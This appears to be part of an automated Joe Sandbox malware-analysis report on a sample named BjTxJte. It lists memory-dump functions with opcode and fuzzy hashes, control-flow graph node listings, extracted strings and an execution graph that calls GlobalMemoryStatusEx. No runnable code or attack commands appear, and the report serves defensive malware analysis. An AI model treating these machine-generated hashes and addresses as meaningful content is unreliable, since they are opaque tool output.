                                                                                      • Source File: 00000014.00000002.1930365303.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_20_2_101d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction ID: e96775076a5ba4b1027b67bfa55b6291fda18b934bb889845dc19e27deddfd15
                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction Fuzzy Hash: 8C119075504280DFDB16CF58D5C8B16FFA2FB44314F24C6AAE8494B65AC33BD44ACB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0101D2EB Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000014.00000002.1930365303.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_20_2_101d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction ID: 607d4a0d6bc084933fbc945c7177065fded8ee136129a54a2c5bd5efdc3ca9cd
                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction Fuzzy Hash: 5B11DD75504280CFDB06CF58D5C8B15BFB1FB84318F24C6AED8894B25AC33AD40ACB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0100D92D Relevance: .0, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000014.00000002.1930276681.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_20_2_100d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fb43620cf2c4ee0a07f1b6a1c4c163257f0753408cd7fb927324ccdb421bff47
                                                                                      • Instruction ID: e9f80ef1bf94e3124195fdd514e1136c600673fc93fa1f4e7263b2ddff3e5148
                                                                                      • Opcode Fuzzy Hash: fb43620cf2c4ee0a07f1b6a1c4c163257f0753408cd7fb927324ccdb421bff47
                                                                                      • Instruction Fuzzy Hash: 5501F7710083009AF7124EAAD98476BFFD9EF41324F08C46AED894A1C6C279D840C7B1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0100D92C Relevance: .0, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000014.00000002.1930276681.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_20_2_100d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 550c78f9424893dd042c3c1f97808239ceb128241db5b4a41c10d4ea34a3a00e
                                                                                      • Instruction ID: 6ccae448823c5b82925bcd79384ba2d9d9f2cabe937ae028fd8cc260b3d04a7d
                                                                                      • Opcode Fuzzy Hash: 550c78f9424893dd042c3c1f97808239ceb128241db5b4a41c10d4ea34a3a00e
                                                                                      • Instruction Fuzzy Hash: 89F06271404344AAE7118A5AD8C4B66FFE8EF45724F18C45AED884A2C6C2799844CBB1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:5.1%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:5
                                                                                      Total number of Limit Nodes:1
                                                                                      execution_graph 41513 689fa68 41515 689fa7d 41513->41515 41514 689fc92 41515->41514 41516 689fca9 GlobalMemoryStatusEx GlobalMemoryStatusEx 41515->41516 41517 689fcb8 GlobalMemoryStatusEx GlobalMemoryStatusEx 41515->41517 41516->41515 41517->41515

                                                                                      Executed Functions

                                                                                      Function 06893480 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 124 6893480-68934a1 125 68934a3-68934a6 124->125 126 68934ac-68934cb 125->126 127 6893c47-6893c4a 125->127 137 68934cd-68934d0 126->137 138 68934e4-68934ee 126->138 128 6893c4c-6893c6b 127->128 129 6893c70-6893c72 127->129 128->129 130 6893c79-6893c7c 129->130 131 6893c74 129->131 130->125 133 6893c82-6893c8b 130->133 131->130 137->138 139 68934d2-68934e2 137->139 142 68934f4-6893503 138->142 139->142 251 6893505 call 6893c98 142->251 252 6893505 call 6893ca0 142->252 143 689350a-689350f 144 689351c-68937f9 143->144 145 6893511-6893517 143->145 166 6893c39-6893c46 144->166 167 68937ff-68938ae 144->167 145->133 176 68938b0-68938d5 167->176 177 68938d7 167->177 179 68938e0-68938f3 176->179 177->179 181 68938f9-689391b 179->181 182 6893c20-6893c2c 179->182 181->182 185 6893921-689392b 181->185 182->167 183 6893c32 182->183 183->166 185->182 186 6893931-689393c 185->186 186->182 187 6893942-6893a18 186->187 199 6893a1a-6893a1c 187->199 200 6893a26-6893a56 187->200 199->200 204 6893a58-6893a5a 200->204 205 6893a64-6893a70 200->205 204->205 206 6893ad0-6893ad4 205->206 207 6893a72-6893a76 205->207 208 6893ada-6893b16 206->208 209 6893c11-6893c1a 206->209 207->206 210 6893a78-6893aa2 207->210 221 6893b18-6893b1a 208->221 222 6893b24-6893b32 208->222 209->182 209->187 217 6893ab0-6893acd call 689306c 210->217 218 6893aa4-6893aa6 210->218 217->206 218->217 221->222 225 6893b49-6893b54 222->225 226 6893b34-6893b3f 222->226 230 6893b6c-6893b7d 225->230 231 6893b56-6893b5c 225->231 226->225 229 6893b41 226->229 229->225 235 6893b7f-6893b85 230->235 236 6893b95-6893ba1 230->236 232 6893b5e 231->232 233 6893b60-6893b62 231->233 232->230 233->230 237 6893b89-6893b8b 235->237 238 6893b87 235->238 240 6893bb9-6893c0a 236->240 241 6893ba3-6893ba9 236->241 237->236 238->236 240->209 242 6893bab 241->242 243 6893bad-6893baf 241->243 242->240 243->240 251->143 252->143
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2392861976
                                                                                      • Opcode ID: 63782c88eb76636c4910bd49c0d0c43d6f7a0a5a25d9dd0101b9a94f4bb2caa1
                                                                                      • Instruction ID: 6c75c0631553d0f2b2fd5f332bc777b378ef35eb0a3f0470d07b95f36b1290dc
                                                                                      • Opcode Fuzzy Hash: 63782c88eb76636c4910bd49c0d0c43d6f7a0a5a25d9dd0101b9a94f4bb2caa1
                                                                                      • Instruction Fuzzy Hash: FD321D31E1071ACFCF14EF75D89459DB7B6BF89304F1486AAD409AB224EB30AD85CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06897D90 Relevance: 3.0, Strings: 2, Instructions: 472COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1154 6897d90-6897dae 1155 6897db0-6897db3 1154->1155 1156 6897db5-6897dd1 1155->1156 1157 6897dd6-6897dd9 1155->1157 1156->1157 1158 6897ddb-6897de5 1157->1158 1159 6897de6-6897de9 1157->1159 1160 6897deb-6897df9 1159->1160 1161 6897e00-6897e03 1159->1161 1169 6897e36-6897e4c 1160->1169 1170 6897dfb 1160->1170 1163 6897e05-6897e1f 1161->1163 1164 6897e24-6897e26 1161->1164 1163->1164 1166 6897e28 1164->1166 1167 6897e2d-6897e30 1164->1167 1166->1167 1167->1155 1167->1169 1174 6897e52-6897e5b 1169->1174 1175 6898067-6898071 1169->1175 1170->1161 1176 6897e61-6897e7e 1174->1176 1177 6898072-68980a7 1174->1177 1184 6898054-6898061 1176->1184 1185 6897e84-6897eac 1176->1185 1180 68980a9-68980ac 1177->1180 1182 68982d8-68982db 1180->1182 1183 68980b2-68980c1 1180->1183 1186 68982e1-68982ed 1182->1186 1187 6898392-6898395 1182->1187 1195 68980e0-689811b 1183->1195 1196 68980c3-68980de 1183->1196 1184->1174 1184->1175 1185->1184 1212 6897eb2-6897ebb 1185->1212 1194 68982f8-68982fa 1186->1194 1188 68983b8-68983ba 1187->1188 1189 6898397-68983b3 1187->1189 1191 68983bc 1188->1191 1192 68983c1-68983c4 1188->1192 1189->1188 1191->1192 1192->1180 1198 68983ca-68983d3 1192->1198 1199 68982fc-6898302 1194->1199 1200 6898312-6898319 1194->1200 1210 68982ac-68982c2 1195->1210 1211 6898121-6898132 1195->1211 1196->1195 1206 6898304 1199->1206 1207 6898306-6898308 1199->1207 1201 689831b-6898328 1200->1201 1202 689832a 1200->1202 1208 689832f-6898331 1201->1208 1202->1208 1206->1200 1207->1200 1213 6898348-6898381 1208->1213 1214 6898333-6898336 1208->1214 1210->1182 1221 6898138-6898155 1211->1221 1222 6898297-68982a6 1211->1222 1212->1177 1217 6897ec1-6897edd 1212->1217 1213->1183 1235 6898387-6898391 1213->1235 1214->1198 1224 6897ee3-6897f0d 1217->1224 1225 6898042-689804e 1217->1225 1221->1222 1233 689815b-6898251 call 68965b8 1221->1233 1222->1210 1222->1211 1238 6898038-689803d 1224->1238 1239 6897f13-6897f3b 1224->1239 1225->1184 1225->1212 1287 689825f 1233->1287 1288 6898253-689825d 1233->1288 1238->1225 1239->1238 1246 6897f41-6897f6f 1239->1246 1246->1238 1251 6897f75-6897f7e 1246->1251 1251->1238 1252 6897f84-6897fb6 1251->1252 1260 6897fb8-6897fbc 1252->1260 1261 6897fc1-6897fdd 1252->1261 1260->1238 1263 6897fbe 1260->1263 1261->1225 1264 6897fdf-6898036 call 68965b8 1261->1264 1263->1261 1264->1225 1289 6898264-6898266 1287->1289 1288->1289 1289->1222 1290 6898268-689826d 1289->1290 1291 689827b 1290->1291 1292 689826f-6898279 1290->1292 1293 6898280-6898282 1291->1293 1292->1293 1293->1222 1294 6898284-6898290 1293->1294 1294->1222
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q
                                                                                      • API String ID: 0-355816377
                                                                                      • Opcode ID: 7002be9966332ec15f31cf9f59cabf2f55288f6eff300aa622470a66a135de28
                                                                                      • Instruction ID: 49a3fc3d8c35d2fbf13f889d319721a2c38178b1a751451fbb77d9a2847e2402
                                                                                      • Opcode Fuzzy Hash: 7002be9966332ec15f31cf9f59cabf2f55288f6eff300aa622470a66a135de28
                                                                                      • Instruction Fuzzy Hash: EB029B31B0021A8FDF54DB74D590AAEB7E2EB85304F188969D509DB394EB31EC86CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06896608 Relevance: .8, Instructions: 817COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: baa7060fc12693be41d0184a8c800893f762759004a43c17730ea25049efd7e3
                                                                                      • Instruction ID: 757c4d6cf16547e9e6842940a9c8d1b672255a5dde926b69780df8f264e06fae
                                                                                      • Opcode Fuzzy Hash: baa7060fc12693be41d0184a8c800893f762759004a43c17730ea25049efd7e3
                                                                                      • Instruction Fuzzy Hash: 4462AF35B002048FEF54DB68D594AADB7F2EF84314F188469E506EB354EB35EC86CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0689B32E Relevance: .6, Instructions: 558COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 06dced710806a54d9ca11fdcb15259258864aeb489c686791dc15778afdd93f2
                                                                                      • Instruction ID: e9ca1c14e8cb0e704f1caa1ef1349fa22bba143dc14984d386e8a2e666156893
                                                                                      • Opcode Fuzzy Hash: 06dced710806a54d9ca11fdcb15259258864aeb489c686791dc15778afdd93f2
                                                                                      • Instruction Fuzzy Hash: 63228430F101098FDF64DB68E5847AEB7F2EB89310F288926E509EB355DA35DC85CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0689ACE8 Relevance: 12.9, Strings: 10, Instructions: 392COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 689ace8-689ad06 1 689ad08-689ad0b 0->1 2 689ad1b-689ad1e 1->2 3 689ad0d-689ad16 1->3 4 689ad41-689ad44 2->4 5 689ad20-689ad3c 2->5 3->2 6 689ad55-689ad58 4->6 7 689ad46-689ad4a 4->7 5->4 8 689ad5a-689ad6d 6->8 9 689ad72-689ad75 6->9 11 689ad50 7->11 12 689af14-689af1e 7->12 8->9 13 689ad8f-689ad92 9->13 14 689ad77-689ad80 9->14 11->6 18 689ad9c-689ad9f 13->18 19 689ad94-689ad99 13->19 16 689af1f-689af56 14->16 17 689ad86-689ad8a 14->17 26 689af58-689af5b 16->26 17->13 21 689af05-689af0e 18->21 22 689ada5-689ada8 18->22 19->18 21->12 21->14 24 689adaa-689adb7 22->24 25 689adbc-689adbe 22->25 24->25 27 689adc0 25->27 28 689adc5-689adc8 25->28 30 689af61-689af9c 26->30 31 689b1c4-689b1c7 26->31 27->28 28->1 29 689adce-689adf2 28->29 52 689adf8-689ae07 29->52 53 689af02 29->53 39 689b18f-689b1a2 30->39 40 689afa2-689afae 30->40 33 689b1c9 call 689b32e 31->33 34 689b1d6-689b1d9 31->34 41 689b1cf-689b1d1 33->41 36 689b1db-689b1df 34->36 37 689b1ea-689b1ed 34->37 36->30 42 689b1e5 36->42 43 689b1ef-689b20b 37->43 44 689b210-689b213 37->44 45 689b1a4 39->45 55 689afce-689b012 40->55 56 689afb0-689afc9 40->56 41->34 42->37 43->44 46 689b220-689b222 44->46 47 689b215-689b21f 44->47 45->31 50 689b229-689b22c 46->50 51 689b224 46->51 50->26 57 689b232-689b23c 50->57 51->50 61 689ae09-689ae0f 52->61 62 689ae1f-689ae5a call 68965b8 52->62 53->21 74 689b02e-689b06d 55->74 75 689b014-689b026 55->75 56->45 63 689ae11 61->63 64 689ae13-689ae15 61->64 79 689ae5c-689ae62 62->79 80 689ae72-689ae89 62->80 63->62 64->62 81 689b073-689b14e call 68965b8 74->81 82 689b154-689b169 74->82 75->74 83 689ae64 79->83 84 689ae66-689ae68 79->84 91 689ae8b-689ae91 80->91 92 689aea1-689aeb2 80->92 81->82 82->39 83->80 84->80 94 689ae93 91->94 95 689ae95-689ae97 91->95 98 689aeca-689aefb 92->98 99 689aeb4-689aeba 92->99 94->92 95->92 98->53 101 689aebc 99->101 102 689aebe-689aec0 99->102 101->98 102->98
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: dM$dM$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-292641143
                                                                                      • Opcode ID: 4253e48f5678844c70d1a6aa01aa160bdb4d984b9824c9a71b41ecbe0630abe3
                                                                                      • Instruction ID: fac4f1effea9be0e46e28a1b10932ecaf60c0c2b419c493448a922adfac4dbca
                                                                                      • Opcode Fuzzy Hash: 4253e48f5678844c70d1a6aa01aa160bdb4d984b9824c9a71b41ecbe0630abe3
                                                                                      • Instruction Fuzzy Hash: ECE16D31E102198FDF69DFA8D4806AEB7B2EF89304F14852AE505EB354DB71DC46CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0689CF78 Relevance: 4.5, Strings: 3, Instructions: 795COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 319 689cf78-689cf93 320 689cf95-689cf98 319->320 321 689cf9a-689cfb0 320->321 322 689cfb5-689cfb8 320->322 321->322 323 689cfba-689cffc 322->323 324 689d001-689d004 322->324 323->324 326 689d04d-689d050 324->326 327 689d006-689d048 324->327 329 689d099-689d09c 326->329 330 689d052-689d094 326->330 327->326 333 689d09e-689d0ad 329->333 334 689d0e5-689d0e8 329->334 330->329 339 689d0bc-689d0c8 333->339 340 689d0af-689d0b4 333->340 336 689d0ea-689d12c 334->336 337 689d131-689d134 334->337 336->337 342 689d157-689d15a 337->342 343 689d136-689d152 337->343 344 689d0ce-689d0e0 339->344 345 689d991-689d9c6 339->345 340->339 348 689d169-689d16c 342->348 349 689d15c-689d15e 342->349 343->342 344->334 362 689d9c8-689d9cb 345->362 356 689d460-689d46c 348->356 357 689d172-689d175 348->357 353 689d45d 349->353 354 689d164 349->354 353->356 354->348 356->333 359 689d472-689d75f 356->359 363 689d1be-689d1c1 357->363 364 689d177-689d1b9 357->364 531 689d765-689d76b 359->531 532 689d986-689d990 359->532 369 689d9cd-689d9f9 362->369 370 689d9fe-689da01 362->370 367 689d20a-689d20d 363->367 368 689d1c3-689d1d2 363->368 364->363 381 689d20f-689d251 367->381 382 689d256-689d259 367->382 374 689d1e1-689d1ed 368->374 375 689d1d4-689d1d9 368->375 369->370 378 689da03-689da1f 370->378 379 689da24-689da27 370->379 374->345 383 689d1f3-689d205 374->383 375->374 378->379 387 689da29 379->387 388 689da36-689da38 379->388 381->382 384 689d25b-689d260 382->384 385 689d263-689d266 382->385 383->367 384->385 395 689d268-689d2aa 385->395 396 689d2af-689d2b2 385->396 578 689da29 call 689daf8 387->578 579 689da29 call 689dae5 387->579 389 689da3a 388->389 390 689da3f-689da42 388->390 389->390 390->362 400 689da44-689da53 390->400 395->396 401 689d2fb-689d2fe 396->401 402 689d2b4-689d2f6 396->402 399 689da2f-689da31 399->388 419 689daba-689dacf 400->419 420 689da55-689dab8 call 68965b8 400->420 407 689d309-689d30b 401->407 408 689d300-689d302 401->408 402->401 414 689d30d 407->414 415 689d312-689d315 407->415 412 689d31b-689d324 408->412 413 689d304 408->413 423 689d333-689d33f 412->423 424 689d326-689d32b 412->424 413->407 414->415 415->320 415->412 420->419 428 689d450-689d455 423->428 429 689d345-689d359 423->429 424->423 428->353 429->353 443 689d35f-689d371 429->443 450 689d373-689d379 443->450 451 689d395-689d397 443->451 452 689d37b 450->452 453 689d37d-689d389 450->453 456 689d3a1-689d3ad 451->456 457 689d38b-689d393 452->457 453->457 463 689d3bb 456->463 464 689d3af-689d3b9 456->464 457->456 465 689d3c0-689d3c2 463->465 464->465 465->353 468 689d3c8-689d3e4 call 68965b8 465->468 476 689d3f3-689d3ff 468->476 477 689d3e6-689d3eb 468->477 476->428 479 689d401-689d44e 476->479 477->476 479->353 533 689d77a-689d783 531->533 534 689d76d-689d772 531->534 533->345 535 689d789-689d79c 533->535 534->533 537 689d7a2-689d7a8 535->537 538 689d976-689d980 535->538 539 689d7aa-689d7af 537->539 540 689d7b7-689d7c0 537->540 538->531 538->532 539->540 540->345 541 689d7c6-689d7e7 540->541 544 689d7e9-689d7ee 541->544 545 689d7f6-689d7ff 541->545 544->545 545->345 546 689d805-689d822 545->546 546->538 549 689d828-689d82e 546->549 549->345 550 689d834-689d84d 549->550 552 689d969-689d970 550->552 553 689d853-689d87a 550->553 552->538 552->549 553->345 556 689d880-689d88a 553->556 556->345 557 689d890-689d8a7 556->557 559 689d8a9-689d8b4 557->559 560 689d8b6-689d8d1 557->560 559->560 560->552 565 689d8d7-689d8f0 call 68965b8 560->565 569 689d8ff-689d908 565->569 570 689d8f2-689d8f7 565->570 569->345 571 689d90e-689d962 569->571 570->569 571->552 578->399 579->399
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q
                                                                                      • API String ID: 0-831282457
                                                                                      • Opcode ID: d9b9554ad42f0bfecfead41445b3b28fd7093a1731448b4cbb7c9e310f4ca0f6
                                                                                      • Instruction ID: ba7d8eeec5369b98e9b6434348400112b14fa5a0e6d16f5764273d70774cb33e
                                                                                      • Opcode Fuzzy Hash: d9b9554ad42f0bfecfead41445b3b28fd7093a1731448b4cbb7c9e310f4ca0f6
                                                                                      • Instruction Fuzzy Hash: BF622C31A0060ACFCB55EF68D590A5EB7E2FF84304B248A69D009DF359DB71ED4ACB94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06894B88 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 580 6894b88-6894bac 581 6894bae-6894bb1 580->581 582 6894bb3-6894bcd 581->582 583 6894bd2-6894bd5 581->583 582->583 584 6894bdb-6894cd3 583->584 585 68952b4-68952b6 583->585 603 6894cd9-6894d21 584->603 604 6894d56-6894d5d 584->604 587 68952b8 585->587 588 68952bd-68952c0 585->588 587->588 588->581 589 68952c6-68952d3 588->589 625 6894d26 call 6895440 603->625 626 6894d26 call 6895432 603->626 605 6894de1-6894dea 604->605 606 6894d63-6894dd3 604->606 605->589 623 6894dde 606->623 624 6894dd5 606->624 617 6894d2c-6894d48 620 6894d4a 617->620 621 6894d53 617->621 620->621 621->604 623->605 624->623 625->617 626->617
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$XPcq$\Ocq
                                                                                      • API String ID: 0-3575482020
                                                                                      • Opcode ID: 000cd0f8434c14fb1c6ef78f9f60320cc5b5a663a8d0a3351e66af3e5b9b90d9
                                                                                      • Instruction ID: e820470b2be7b0d0e1281af8727a2d24bfb9cb3b2d27ec2df8afe3273b84019f
                                                                                      • Opcode Fuzzy Hash: 000cd0f8434c14fb1c6ef78f9f60320cc5b5a663a8d0a3351e66af3e5b9b90d9
                                                                                      • Instruction Fuzzy Hash: F4619030F002189FEF549FB5C8557AEBAF6EB88300F24842AE109EB395DF758D458B95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06894B79 Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1631 6894b79-6894bac 1633 6894bae-6894bb1 1631->1633 1634 6894bb3-6894bcd 1633->1634 1635 6894bd2-6894bd5 1633->1635 1634->1635 1636 6894bdb-6894cd3 1635->1636 1637 68952b4-68952b6 1635->1637 1655 6894cd9-6894d21 1636->1655 1656 6894d56-6894d5d 1636->1656 1639 68952b8 1637->1639 1640 68952bd-68952c0 1637->1640 1639->1640 1640->1633 1641 68952c6-68952d3 1640->1641 1677 6894d26 call 6895440 1655->1677 1678 6894d26 call 6895432 1655->1678 1657 6894de1-6894dea 1656->1657 1658 6894d63-6894dd3 1656->1658 1657->1641 1675 6894dde 1658->1675 1676 6894dd5 1658->1676 1669 6894d2c-6894d48 1672 6894d4a 1669->1672 1673 6894d53 1669->1673 1672->1673 1673->1656 1675->1657 1676->1675 1677->1669 1678->1669
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$XPcq
                                                                                      • API String ID: 0-936005338
                                                                                      • Opcode ID: 38bc62e3f5f499dccf40cb7292fe0edb530efe1bb7aaebfd1228f4e374f7cf80
                                                                                      • Instruction ID: d042a5ac7ef17206ac4258cafdd5f8942395ccc28c616c6f20cb50144c374ab4
                                                                                      • Opcode Fuzzy Hash: 38bc62e3f5f499dccf40cb7292fe0edb530efe1bb7aaebfd1228f4e374f7cf80
                                                                                      • Instruction Fuzzy Hash: E3519E30F002189FEF549FB5C855BAEBBF6EF88700F20842AE105EB395DA758C018B95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0689DAF8 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1871 689daf8-689db0f 1872 689db11-689db14 1871->1872 1873 689db37-689db3a 1872->1873 1874 689db16-689db32 1872->1874 1875 689db49-689db4c 1873->1875 1876 689db3c 1873->1876 1874->1873 1878 689db7f-689db81 1875->1878 1879 689db4e-689db7a 1875->1879 1880 689db42-689db44 1876->1880 1881 689db88-689db8b 1878->1881 1882 689db83 1878->1882 1879->1878 1880->1875 1881->1872 1884 689db8d-689db9c 1881->1884 1882->1881 1886 689dd21-689dd4b 1884->1886 1887 689dba2-689dbdb 1884->1887 1890 689dd4c 1886->1890 1894 689dc29-689dc4d 1887->1894 1895 689dbdd-689dbe7 1887->1895 1890->1890 1901 689dc4f 1894->1901 1902 689dc57-689dd1b 1894->1902 1899 689dbe9-689dbef 1895->1899 1900 689dbff-689dc27 1895->1900 1903 689dbf1 1899->1903 1904 689dbf3-689dbf5 1899->1904 1900->1894 1900->1895 1901->1902 1902->1886 1902->1887 1903->1900 1904->1900
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      • Opcode ID: cae987850034ed3654c3aa39b9094ba86beb34d8a513929b791b525d04a4b0db
                                                                                      • Instruction ID: 9c71831f274690e970961c16e142b66a3587c056491907e94cfd73b80cb3850c
                                                                                      • Opcode Fuzzy Hash: cae987850034ed3654c3aa39b9094ba86beb34d8a513929b791b525d04a4b0db
                                                                                      • Instruction Fuzzy Hash: 70419D30E006099FDF65DFA5C8546AEBBB2FF85304F248929D505EB340DB70E846CBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0689DAE5 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      • Opcode ID: a6b9ca2ce8eeb8ec40c18fc30d3231f188d141c621d35e8a507509a1b4b13569
                                                                                      • Instruction ID: 05525cd5c3749fabe472671a02db619ddf9009e500b4dcd04a847690dff27949
                                                                                      • Opcode Fuzzy Hash: a6b9ca2ce8eeb8ec40c18fc30d3231f188d141c621d35e8a507509a1b4b13569
